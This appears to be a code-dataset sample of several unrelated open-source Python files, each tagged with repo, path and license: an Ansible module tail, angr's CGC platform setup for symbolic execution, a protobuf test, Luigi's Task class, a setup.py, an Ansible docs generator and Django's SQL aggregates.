u_content = unicode(content, content_encoding, errors='xmlcharrefreplace')
if content_type.startswith('application/json') or \
content_type.startswith('text/json'):
try:
js = json.loads(u_content)
uresp['json'] = js
except:
pass
else:
u_content = unicode(content, content_encoding, errors='xmlcharrefreplace')
if resp['status'] not in status_code:
module.fail_json(msg="Status code was not " + str(status_code), content=u_content, **uresp)
elif return_content:
module.exit_json(changed=changed, content=u_content, **uresp)
else:
module.exit_json(changed=changed, **uresp)
# import module snippets
from ansible.module_utils.basic import *
if __name__ == '__main__':
main()
| gpl-3.0 |
tyb0807/angr | angr/simos/cgc.py | 1 | 6180 |
import logging
import claripy
from cle import BackedCGC
from ..misc import IRange
from ..procedures import SIM_LIBRARIES as L
from ..state_plugins import SimActionData
from .. import sim_options as o
from .userland import SimUserland
_l = logging.getLogger('angr.simos.cgc')
class SimCGC(SimUserland):
"""
Environment configuration for the CGC DECREE platform
"""
def __init__(self, project, **kwargs):
super(SimCGC, self).__init__(project,
syscall_library=L['cgcabi'],
syscall_addr_alignment=1,
name="CGC",
**kwargs)
# pylint: disable=arguments-differ
def state_blank(self, flag_page=None, **kwargs):
"""
:param flag_page: Flag page content, either a string or a list of BV8s
"""
s = super(SimCGC, self).state_blank(**kwargs) # pylint:disable=invalid-name
# Special stack base for CGC binaries to work with Shellphish CRS
s.regs.sp = 0xbaaaaffc
# Map the special cgc memory
if o.ABSTRACT_MEMORY not in s.options:
s.memory.mem._preapproved_stack = IRange(0xbaaab000 - 1024 * 1024 * 8, 0xbaaab000)
s.memory.map_region(0x4347c000, 4096, 1)
# Create the CGC plugin
s.get_plugin('cgc')
# Set up the flag page
if flag_page is None:
flag_page = [s.solver.BVS("cgc-flag-byte-%d" % i, 8, key=('flag', i), eternal=True) for i in xrange(0x1000)]
elif type(flag_page) is bytes:
flag_page = [s.solver.BVV(c) for c in flag_page]
elif type(flag_page) is list:
pass
else:
raise ValueError("Bad flag page: expected None, bytestring, or list, but got %s" % type(flag_page))
s.cgc.flag_bytes = flag_page
if s.mode != 'static':
s.memory.store(0x4347c000, claripy.Concat(*s.cgc.flag_bytes), priv=True)
# set up the address for concrete transmits
s.unicorn.transmit_addr = self.syscall_from_number(2).addr
s.libc.max_str_len = 1000000
s.libc.max_strtol_len = 10
s.libc.max_memcpy_size = 0x100000
s.libc.max_symbolic_bytes = 100
s.libc.max_buffer_size = 0x100000
return s
def state_entry(self, add_options=None, **kwargs):
if isinstance(self.project.loader.main_object, BackedCGC):
kwargs['permissions_backer'] = (True, self.project.loader.main_object.permissions_map)
if add_options is None:
add_options = set()
add_options.add(o.ZERO_FILL_UNCONSTRAINED_MEMORY)
state = super(SimCGC, self).state_entry(add_options=add_options, **kwargs)
if isinstance(self.project.loader.main_object, BackedCGC):
for reg, val in self.project.loader.main_object.initial_register_values():
if reg in state.arch.registers:
setattr(state.regs, reg, val)
elif reg == 'eflags':
pass
elif reg == 'fctrl':
state.regs.fpround = (val & 0xC00) >> 10
elif reg == 'fstat':
state.regs.fc3210 = (val & 0x4700)
elif reg == 'ftag':
empty_bools = [((val >> (x * 2)) & 3) == 3 for x in xrange(8)]
tag_chars = [claripy.BVV(0 if x else 1, 8) for x in empty_bools]
for i, tag in enumerate(tag_chars):
setattr(state.regs, 'fpu_t%d' % i, tag)
elif reg in ('fiseg', 'fioff', 'foseg', 'fooff', 'fop'):
pass
elif reg == 'mxcsr':
state.regs.sseround = (val & 0x600) >> 9
else:
_l.error("What is this register %s I have to translate?", reg)
# Update allocation base
state.cgc.allocation_base = self.project.loader.main_object.current_allocation_base
# Do all the writes
writes_backer = self.project.loader.main_object.writes_backer
stdout = state.posix.get_fd(1)
pos = 0
for size in writes_backer:
if size == 0:
continue
str_to_write = state.solver.BVS('file_write', size*8)
a = SimActionData(
state,
'file_1_0',
'write',
addr=claripy.BVV(pos, state.arch.bits),
data=str_to_write,
size=size)
stdout.write_data(str_to_write)
state.history.add_action(a)
pos += size
else:
# Set CGC-specific variables
state.regs.eax = 0
state.regs.ebx = 0
state.regs.ecx = 0x4347c000
state.regs.edx = 0
state.regs.edi = 0
state.regs.esi = 0
state.regs.esp = 0xbaaaaffc
state.regs.ebp = 0
state.regs.cc_dep1 = 0x202 # default eflags
state.regs.cc_op = 0 # OP_COPY
state.regs.cc_dep2 = 0 # doesn't matter
state.regs.cc_ndep = 0 # doesn't matter
# fpu values
state.regs.mm0 = 0
state.regs.mm1 = 0
state.regs.mm2 = 0
state.regs.mm3 = 0
state.regs.mm4 = 0
state.regs.mm5 = 0
state.regs.mm6 = 0
state.regs.mm7 = 0
state.regs.fpu_tags = 0
state.regs.fpround = 0
state.regs.fc3210 = 0x0300
state.regs.ftop = 0
# sse values
state.regs.sseround = 0
state.regs.xmm0 = 0
state.regs.xmm1 = 0
state.regs.xmm2 = 0
state.regs.xmm3 = 0
state.regs.xmm4 = 0
state.regs.xmm5 = 0
state.regs.xmm6 = 0
state.regs.xmm7 = 0
# segmentation registers
state.regs.ds = 0
state.regs.es = 0
state.regs.fs = 0
state.regs.gs = 0
state.regs.ss = 0
state.regs.cs = 0
return state
| bsd-2-clause |
SOKP/external_chromium_org | third_party/protobuf/python/google/protobuf/internal/unknown_fields_test.py | 215 | 6585 | #! /usr/bin/python
# -*- coding: utf-8 -*-
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Test for preservation of unknown fields in the pure Python implementation."""
__author__ = 'bohdank@google.com (Bohdan Koval)'
import unittest
from google.protobuf import unittest_mset_pb2
from google.protobuf import unittest_pb2
from google.protobuf.internal import encoder
from google.protobuf.internal import test_util
from google.protobuf.internal import type_checkers
class UnknownFieldsTest(unittest.TestCase):
def setUp(self):
self.descriptor = unittest_pb2.TestAllTypes.DESCRIPTOR
self.all_fields = unittest_pb2.TestAllTypes()
test_util.SetAllFields(self.all_fields)
self.all_fields_data = self.all_fields.SerializeToString()
self.empty_message = unittest_pb2.TestEmptyMessage()
self.empty_message.ParseFromString(self.all_fields_data)
self.unknown_fields = self.empty_message._unknown_fields
def GetField(self, name):
field_descriptor = self.descriptor.fields_by_name[name]
wire_type = type_checkers.FIELD_TYPE_TO_WIRE_TYPE[field_descriptor.type]
field_tag = encoder.TagBytes(field_descriptor.number, wire_type)
for tag_bytes, value in self.unknown_fields:
if tag_bytes == field_tag:
decoder = unittest_pb2.TestAllTypes._decoders_by_tag[tag_bytes]
result_dict = {}
decoder(value, 0, len(value), self.all_fields, result_dict)
return result_dict[field_descriptor]
def testVarint(self):
value = self.GetField('optional_int32')
self.assertEqual(self.all_fields.optional_int32, value)
def testFixed32(self):
value = self.GetField('optional_fixed32')
self.assertEqual(self.all_fields.optional_fixed32, value)
def testFixed64(self):
value = self.GetField('optional_fixed64')
self.assertEqual(self.all_fields.optional_fixed64, value)
def testLengthDelimited(self):
value = self.GetField('optional_string')
self.assertEqual(self.all_fields.optional_string, value)
def testGroup(self):
value = self.GetField('optionalgroup')
self.assertEqual(self.all_fields.optionalgroup, value)
def testSerialize(self):
data = self.empty_message.SerializeToString()
# Don't use assertEqual because we don't want to dump raw binary data to
# stdout.
self.assertTrue(data == self.all_fields_data)
def testCopyFrom(self):
message = unittest_pb2.TestEmptyMessage()
message.CopyFrom(self.empty_message)
self.assertEqual(self.unknown_fields, message._unknown_fields)
def testMergeFrom(self):
message = unittest_pb2.TestAllTypes()
message.optional_int32 = 1
message.optional_uint32 = 2
source = unittest_pb2.TestEmptyMessage()
source.ParseFromString(message.SerializeToString())
message.ClearField('optional_int32')
message.optional_int64 = 3
message.optional_uint32 = 4
destination = unittest_pb2.TestEmptyMessage()
destination.ParseFromString(message.SerializeToString())
unknown_fields = destination._unknown_fields[:]
destination.MergeFrom(source)
self.assertEqual(unknown_fields + source._unknown_fields,
destination._unknown_fields)
def testClear(self):
self.empty_message.Clear()
self.assertEqual(0, len(self.empty_message._unknown_fields))
def testByteSize(self):
self.assertEqual(self.all_fields.ByteSize(), self.empty_message.ByteSize())
def testUnknownExtensions(self):
message = unittest_pb2.TestEmptyMessageWithExtensions()
message.ParseFromString(self.all_fields_data)
self.assertEqual(self.empty_message._unknown_fields,
message._unknown_fields)
def testListFields(self):
# Make sure ListFields doesn't return unknown fields.
self.assertEqual(0, len(self.empty_message.ListFields()))
def testSerializeMessageSetWireFormatUnknownExtension(self):
# Create a message using the message set wire format with an unknown
# message.
raw = unittest_mset_pb2.RawMessageSet()
# Add an unknown extension.
item = raw.item.add()
item.type_id = 1545009
message1 = unittest_mset_pb2.TestMessageSetExtension1()
message1.i = 12345
item.message = message1.SerializeToString()
serialized = raw.SerializeToString()
# Parse message using the message set wire format.
proto = unittest_mset_pb2.TestMessageSet()
proto.MergeFromString(serialized)
# Verify that the unknown extension is serialized unchanged
reserialized = proto.SerializeToString()
new_raw = unittest_mset_pb2.RawMessageSet()
new_raw.MergeFromString(reserialized)
self.assertEqual(raw, new_raw)
def testEquals(self):
message = unittest_pb2.TestEmptyMessage()
message.ParseFromString(self.all_fields_data)
self.assertEqual(self.empty_message, message)
self.all_fields.ClearField('optional_string')
message.ParseFromString(self.all_fields.SerializeToString())
self.assertNotEqual(self.empty_message, message)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
bmaggard/luigi | luigi/task.py | 1 | 20793 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The abstract :py:class:`Task` class.
It is a central concept of Luigi and represents the state of the workflow.
See :doc:`/tasks` for an overview.
"""
try:
from itertools import imap as map
except ImportError:
pass
import logging
import traceback
import warnings
import json
import hashlib
import re
from luigi import six
from luigi import parameter
from luigi.task_register import Register
Parameter = parameter.Parameter
logger = logging.getLogger('luigi-interface')
def namespace(namespace=None):
"""
Call to set namespace of tasks declared after the call.
If called without arguments or with ``None`` as the namespace, the namespace
is reset, which is recommended to do at the end of any file where the
namespace is set to avoid unintentionally setting namespace on tasks outside
of the scope of the current file.
The namespace of a Task can also be changed by specifying the property
``task_namespace``. This solution has the advantage that the namespace
doesn't have to be restored.
.. code-block:: python
class Task2(luigi.Task):
task_namespace = 'namespace2'
"""
Register._default_namespace = namespace
class BulkCompleteNotImplementedError(NotImplementedError):
"""This is here to trick pylint.
pylint thinks anything raising NotImplementedError needs to be implemented
in any subclass. bulk_complete isn't like that. This tricks pylint into
thinking that the default implementation is a valid implementation and no
an abstract method."""
pass
@six.add_metaclass(Register)
class Task(object):
"""
This is the base class of all Luigi Tasks, the base unit of work in Luigi.
A Luigi Task describes a unit or work.
The key methods of a Task, which must be implemented in a subclass are:
* :py:meth:`run` - the computation done by this task.
* :py:meth:`requires` - the list of Tasks that this Task depends on.
* :py:meth:`output` - the output :py:class:`Target` that this Task creates.
Each :py:class:`~luigi.Parameter` of the Task should be declared as members:
.. code:: python
class MyTask(luigi.Task):
count = luigi.IntParameter()
second_param = luigi.Parameter()
In addition to any declared properties and methods, there are a few
non-declared properties, which are created by the :py:class:`Register`
metaclass:
``Task.task_namespace``
optional string which is prepended to the task name for the sake of
scheduling. If it isn't overridden in a Task, whatever was last declared
using `luigi.namespace` will be used.
"""
_event_callbacks = {}
#: Priority of the task: the scheduler should favor available
#: tasks with higher priority values first.
#: See :ref:`Task.priority`
priority = 0
disabled = False
#: Resources used by the task. Should be formatted like {"scp": 1} to indicate that the
#: task requires 1 unit of the scp resource.
resources = {}
#: Number of seconds after which to time out the run function.
#: No timeout if set to 0.
#: Defaults to 0 or worker-timeout value in config file
#: Only works when using multiple workers.
worker_timeout = None
@property
def owner_email(self):
'''
Override this to send out additional error emails to task owner, in addition to the one
defined in `core`.`error-email`. This should return a string or a list of strings. e.g.
'test@exmaple.com' or ['test1@example.com', 'test2@example.com']
'''
return None
@property
def use_cmdline_section(self):
''' Property used by core config such as `--workers` etc.
These will be exposed without the class as prefix.'''
return True
@classmethod
def event_handler(cls, event):
"""
Decorator for adding event handlers.
"""
def wrapped(callback):
cls._event_callbacks.setdefault(cls, {}).setdefault(event, set()).add(callback)
return callback
return wrapped
def trigger_event(self, event, *args, **kwargs):
"""
Trigger that calls all of the specified events associated with this class.
"""
for event_class, event_callbacks in six.iteritems(self._event_callbacks):
if not isinstance(self, event_class):
continue
for callback in event_callbacks.get(event, []):
try:
# callbacks are protected
callback(*args, **kwargs)
except KeyboardInterrupt:
return
except BaseException:
logger.exception("Error in event callback for %r", event)
@property
def task_module(self):
''' Returns what Python module to import to get access to this class. '''
# TODO(erikbern): we should think about a language-agnostic mechanism
return self.__class__.__module__
@property
def task_family(self):
"""
Convenience method since a property on the metaclass isn't directly accessible through the class instances.
"""
return self.__class__.task_family
@classmethod
def get_params(cls):
"""
Returns all of the Parameters for this Task.
"""
# We want to do this here and not at class instantiation, or else there is no room to extend classes dynamically
params = []
for param_name in dir(cls):
param_obj = getattr(cls, param_name)
if not isinstance(param_obj, Parameter):
continue
params.append((param_name, param_obj))
# The order the parameters are created matters. See Parameter class
params.sort(key=lambda t: t[1]._counter)
return params
@classmethod
def get_param_values(cls, params, args, kwargs):
"""
Get the values of the parameters from the args and kwargs.
:param params: list of (param_name, Parameter).
:param args: positional arguments
:param kwargs: keyword arguments.
:returns: list of `(name, value)` tuples, one for each parameter.
"""
result = {}
params_dict = dict(params)
task_name = cls.task_family
# In case any exceptions are thrown, create a helpful description of how the Task was invoked
# TODO: should we detect non-reprable arguments? These will lead to mysterious errors
exc_desc = '%s[args=%s, kwargs=%s]' % (task_name, args, kwargs)
# Fill in the positional arguments
positional_params = [(n, p) for n, p in params if p.positional]
for i, arg in enumerate(args):
if i >= len(positional_params):
raise parameter.UnknownParameterException('%s: takes at most %d parameters (%d given)' % (exc_desc, len(positional_params), len(args)))
param_name, param_obj = positional_params[i]
result[param_name] = param_obj.normalize(arg)
# Then the keyword arguments
for param_name, arg in six.iteritems(kwargs):
if param_name in result:
raise parameter.DuplicateParameterException('%s: parameter %s was already set as a positional parameter' % (exc_desc, param_name))
if param_name not in params_dict:
raise parameter.UnknownParameterException('%s: unknown parameter %s' % (exc_desc, param_name))
result[param_name] = params_dict[param_name].normalize(arg)
# Then use the defaults for anything not filled in
for param_name, param_obj in params:
if param_name not in result:
if not param_obj.has_task_value(task_name, param_name):
raise parameter.MissingParameterException("%s: requires the '%s' parameter to be set" % (exc_desc, param_name))
result[param_name] = param_obj.task_value(task_name, param_name)
def list_to_tuple(x):
""" Make tuples out of lists and sets to allow hashing """
if isinstance(x, list) or isinstance(x, set):
return tuple(x)
else:
return x
# Sort it by the correct order and make a list
return [(param_name, list_to_tuple(result[param_name])) for param_name, param_obj in params]
def __init__(self, *args, **kwargs):
params = self.get_params()
param_values = self.get_param_values(params, args, kwargs)
# Set all values on class instance
for key, value in param_values:
setattr(self, key, value)
# Register args and kwargs as an attribute on the class. Might be useful
self.param_args = tuple(value for key, value in param_values)
self.param_kwargs = dict(param_values)
# task_id is a concatenation of task family, the first values of the first 3 parameters
# sorted by parameter name and a md5hash of the family/parameters as a cananocalised json.
TASK_ID_INCLUDE_PARAMS = 3
TASK_ID_TRUNCATE_PARAMS = 16
TASK_ID_TRUNCATE_HASH = 10
TASK_ID_INVALID_CHAR_REGEX = r'[^A-Za-z0-9_]'
params = self.to_str_params(only_significant=True)
param_str = json.dumps(params, separators=(',', ':'), sort_keys=True)
param_hash = hashlib.md5(param_str.encode('utf-8')).hexdigest()
param_summary = '_'.join(p[:TASK_ID_TRUNCATE_PARAMS]
for p in (params[p] for p in sorted(params)[:TASK_ID_INCLUDE_PARAMS]))
param_summary = re.sub(TASK_ID_INVALID_CHAR_REGEX, '_', param_summary)
self.task_id = '{}_{}_{}'.format(self.task_family, param_summary, param_hash[:TASK_ID_TRUNCATE_HASH])
self.__hash = hash(self.task_id)
def initialized(self):
"""
Returns ``True`` if the Task is initialized and ``False`` otherwise.
"""
return hasattr(self, 'task_id')
@classmethod
def from_str_params(cls, params_str):
"""
Creates an instance from a str->str hash.
:param params_str: dict of param name -> value as string.
"""
kwargs = {}
for param_name, param in cls.get_params():
if param_name in params_str:
kwargs[param_name] = param.parse(params_str[param_name])
return cls(**kwargs)
def to_str_params(self, only_significant=False):
"""
Convert all parameters to a str->str hash.
"""
params_str = {}
params = dict(self.get_params())
for param_name, param_value in six.iteritems(self.param_kwargs):
if (not only_significant) or params[param_name].significant:
params_str[param_name] = params[param_name].serialize(param_value)
return params_str
def clone(self, cls=None, **kwargs):
"""
Creates a new instance from an existing instance where some of the args have changed.
There's at least two scenarios where this is useful (see test/clone_test.py):
* remove a lot of boiler plate when you have recursive dependencies and lots of args
* there's task inheritance and some logic is on the base class
:param cls:
:param kwargs:
:return:
"""
k = self.param_kwargs.copy()
k.update(six.iteritems(kwargs))
if cls is None:
cls = self.__class__
new_k = {}
for param_name, param_class in cls.get_params():
if param_name in k:
new_k[param_name] = k[param_name]
return cls(**new_k)
def __hash__(self):
return self.__hash
def __repr__(self):
"""
Build a task representation like `MyTask(param1=1.5, param2='5')`
"""
params = self.get_params()
param_values = self.get_param_values(params, [], self.param_kwargs)
# Build up task id
repr_parts = []
param_objs = dict(params)
for param_name, param_value in param_values:
if param_objs[param_name].significant:
repr_parts.append('%s=%s' % (param_name, param_objs[param_name].serialize(param_value)))
task_str = '{}({})'.format(self.task_family, ', '.join(repr_parts))
return task_str
def __eq__(self, other):
return self.__class__ == other.__class__ and self.param_args == other.param_args
def complete(self):
"""
If the task has any outputs, return ``True`` if all outputs exist.
Otherwise, return ``False``.
However, you may freely override this method with custom logic.
"""
outputs = flatten(self.output())
if len(outputs) == 0:
warnings.warn(
"Task %r without outputs has no custom complete() method" % self,
stacklevel=2
)
return False
return all(map(lambda output: output.exists(), outputs))
@classmethod
def bulk_complete(cls, parameter_tuples):
"""
Returns those of parameter_tuples for which this Task is complete.
Override (with an efficient implementation) for efficient scheduling
with range tools. Keep the logic consistent with that of complete().
"""
raise BulkCompleteNotImplementedError()
def output(self):
"""
The output that this Task produces.
The output of the Task determines if the Task needs to be run--the task
is considered finished iff the outputs all exist. Subclasses should
override this method to return a single :py:class:`Target` or a list of
:py:class:`Target` instances.
Implementation note
If running multiple workers, the output must be a resource that is accessible
by all workers, such as a DFS or database. Otherwise, workers might compute
the same output since they don't see the work done by other workers.
See :ref:`Task.output`
"""
return [] # default impl
def requires(self):
"""
The Tasks that this Task depends on.
A Task will only run if all of the Tasks that it requires are completed.
If your Task does not require any other Tasks, then you don't need to
override this method. Otherwise, a Subclasses can override this method
to return a single Task, a list of Task instances, or a dict whose
values are Task instances.
See :ref:`Task.requires`
"""
return [] # default impl
def _requires(self):
"""
Override in "template" tasks which themselves are supposed to be
subclassed and thus have their requires() overridden (name preserved to
provide consistent end-user experience), yet need to introduce
(non-input) dependencies.
Must return an iterable which among others contains the _requires() of
the superclass.
"""
return flatten(self.requires()) # base impl
def process_resources(self):
"""
Override in "template" tasks which provide common resource functionality
but allow subclasses to specify additional resources while preserving
the name for consistent end-user experience.
"""
return self.resources # default impl
def input(self):
"""
Returns the outputs of the Tasks returned by :py:meth:`requires`
See :ref:`Task.input`
:return: a list of :py:class:`Target` objects which are specified as
outputs of all required Tasks.
"""
return getpaths(self.requires())
def deps(self):
"""
Internal method used by the scheduler.
Returns the flattened list of requires.
"""
# used by scheduler
return flatten(self._requires())
def run(self):
"""
The task run method, to be overridden in a subclass.
See :ref:`Task.run`
"""
pass # default impl
def on_failure(self, exception):
"""
Override for custom error handling.
This method gets called if an exception is raised in :py:meth:`run`.
The returned value of this method is json encoded and sent to the scheduler
as the `expl` argument. Its string representation will be used as the
body of the error email sent out if any.
Default behavior is to return a string representation of the stack trace.
"""
traceback_string = traceback.format_exc()
return "Runtime error:\n%s" % traceback_string
def on_success(self):
"""
Override for doing custom completion handling for a larger class of tasks
This method gets called when :py:meth:`run` completes without raising any exceptions.
The returned value is json encoded and sent to the scheduler as the `expl` argument.
Default behavior is to send an None value"""
pass
class MixinNaiveBulkComplete(object):
"""
Enables a Task to be efficiently scheduled with e.g. range tools, by providing a bulk_complete implementation which checks completeness in a loop.
Applicable to tasks whose completeness checking is cheap.
This doesn't exploit output location specific APIs for speed advantage, nevertheless removes redundant scheduler roundtrips.
"""
@classmethod
def bulk_complete(cls, parameter_tuples):
return [t for t in parameter_tuples if cls(t).complete()]
def externalize(task):
"""
Returns an externalized version of the Task.
See :py:class:`ExternalTask`.
"""
task.run = NotImplemented
return task
class ExternalTask(Task):
"""
Subclass for references to external dependencies.
An ExternalTask's does not have a `run` implementation, which signifies to
the framework that this Task's :py:meth:`output` is generated outside of
Luigi.
"""
run = NotImplemented
class WrapperTask(Task):
"""
Use for tasks that only wrap other tasks and that by definition are done if all their requirements exist.
"""
def complete(self):
return all(r.complete() for r in flatten(self.requires()))
class Config(Task):
"""
Class for configuration. See :ref:`ConfigClasses`.
"""
# TODO: let's refactor Task & Config so that it inherits from a common
# ParamContainer base class
pass
def getpaths(struct):
"""
Maps all Tasks in a structured data object to their .output().
"""
if isinstance(struct, Task):
return struct.output()
elif isinstance(struct, dict):
r = {}
for k, v in six.iteritems(struct):
r[k] = getpaths(v)
return r
else:
# Remaining case: assume r is iterable...
try:
s = list(struct)
except TypeError:
raise Exception('Cannot map %s to Task/dict/list' % str(struct))
return [getpaths(r) for r in s]
def flatten(struct):
"""
Creates a flat list of all all items in structured output (dicts, lists, items):
.. code-block:: python
>>> sorted(flatten({'a': 'foo', 'b': 'bar'}))
['bar', 'foo']
>>> sorted(flatten(['foo', ['bar', 'troll']]))
['bar', 'foo', 'troll']
>>> flatten('foo')
['foo']
>>> flatten(42)
[42]
"""
if struct is None:
return []
flat = []
if isinstance(struct, dict):
for _, result in six.iteritems(struct):
flat += flatten(result)
return flat
if isinstance(struct, six.string_types):
return [struct]
try:
# if iterable
iterator = iter(struct)
except TypeError:
return [struct]
for result in iterator:
flat += flatten(result)
return flat
def flatten_output(task):
"""
Lists all output targets by recursively walking output-less (wrapper) tasks.
FIXME order consistently.
"""
r = flatten(task.output())
if not r:
for dep in flatten(task.requires()):
r += flatten_output(dep)
return r
| apache-2.0 |
Clivern/PyArchiver | setup.py | 1 | 1098 | """
PyArchiver Compression and Archiving Library
@author: Clivern U{hello@clivern.com}
"""
from setuptools import setup
from pyarchiver import __VERSION__
import os
# Utility function to read the README file.
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "pyarchiver",
version = __VERSION__,
author = "Clivern",
author_email = "hello@clivern.com",
description="Python Compression and Archiving Library",
license = "MIT",
keywords = "compression,archiving,tarfile,zipfile",
url = "http://clivern.github.io/PyArchiver/",
packages = ['pyarchiver'],
long_description = read('README.md'),
classifiers = [
'Classifier: Development Status :: 5 - Production/Stable',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
# Support Python-2.x and Python-3.x
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4'
],
) | mit |
hryamzik/ansible | docs/bin/dump_keywords.py | 19 | 2987 | #!/usr/bin/env python
import optparse
import re
from distutils.version import LooseVersion
import jinja2
import yaml
from jinja2 import Environment, FileSystemLoader
from ansible.playbook import Play
from ansible.playbook.block import Block
from ansible.playbook.role import Role
from ansible.playbook.task import Task
template_file = 'playbooks_keywords.rst.j2'
oblist = {}
clist = []
class_list = [Play, Role, Block, Task]
p = optparse.OptionParser(
version='%prog 1.0',
usage='usage: %prog [options]',
description='Generate playbook keyword documentation from code and descriptions',
)
p.add_option("-T", "--template-dir", action="store", dest="template_dir", default="../templates", help="directory containing Jinja2 templates")
p.add_option("-o", "--output-dir", action="store", dest="output_dir", default='/tmp/', help="Output directory for rst files")
p.add_option("-d", "--docs-source", action="store", dest="docs", default=None, help="Source for attribute docs")
(options, args) = p.parse_args()
for aclass in class_list:
aobj = aclass()
name = type(aobj).__name__
if options.docs:
with open(options.docs) as f:
docs = yaml.safe_load(f)
else:
docs = {}
# build ordered list to loop over and dict with attributes
clist.append(name)
oblist[name] = dict((x, aobj.__dict__['_attributes'][x]) for x in aobj.__dict__['_attributes'] if 'private' not in x or not x.private)
# pick up docs if they exist
for a in oblist[name]:
if a in docs:
oblist[name][a] = docs[a]
else:
# check if there is an alias, otherwise undocumented
alias = getattr(getattr(aobj, '_%s' % a), 'alias', None)
if alias and alias in docs:
oblist[name][alias] = docs[alias]
del oblist[name][a]
else:
oblist[name][a] = ' UNDOCUMENTED!! '
# loop is really with_ for users
if name == 'Task':
oblist[name]['with_<lookup_plugin>'] = 'The same as ``loop`` but magically adds the output of any lookup plugin to generate the item list.'
# local_action is implicit with action
if 'action' in oblist[name]:
oblist[name]['local_action'] = 'Same as action but also implies ``delegate_to: localhost``'
# remove unusable (used to be private?)
for nouse in ('loop_args', 'loop_with'):
if nouse in oblist[name]:
del oblist[name][nouse]
env = Environment(loader=FileSystemLoader(options.template_dir), trim_blocks=True,)
template = env.get_template(template_file)
outputname = options.output_dir + template_file.replace('.j2', '')
tempvars = {'oblist': oblist, 'clist': clist}
keyword_page = template.render(tempvars)
if LooseVersion(jinja2.__version__) < LooseVersion('2.10'):
# jinja2 < 2.10's indent filter indents blank lines. Cleanup
keyword_page = re.sub(' +\n', '\n', keyword_page)
with open(outputname, 'w') as f:
f.write(keyword_page)
| gpl-3.0 |
NullSoldier/django | django/db/models/sql/aggregates.py | 57 | 4842 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = self._ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = self._computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
# Two fake fields used to identify aggregate types in data-conversion operations.
@cached_property
def _ordinal_aggregate_field(self):
return IntegerField()
@cached_property
def _computed_aggregate_field(self):
return FloatField()
def relabeled_clone(self, change_map):
clone = copy.copy(self)
if isinstance(self.col, (list, tuple)):
clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
return clone
def as_sql(self, compiler, connection):
"Return the aggregate, rendered as SQL with parameters."
params = []
if hasattr(self.col, 'as_sql'):
field_name, params = self.col.as_sql(compiler, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join(compiler(c) for c in self.col)
else:
field_name = compiler(self.col)
substitutions = {
'function': self.sql_function,
'field': field_name
}
substitutions.update(self.extra)
return self.sql_template % substitutions, params
def get_group_by_cols(self):
return []
@property
def output_field(self):
return self.field
class Avg(Aggregate):
is_computed = True
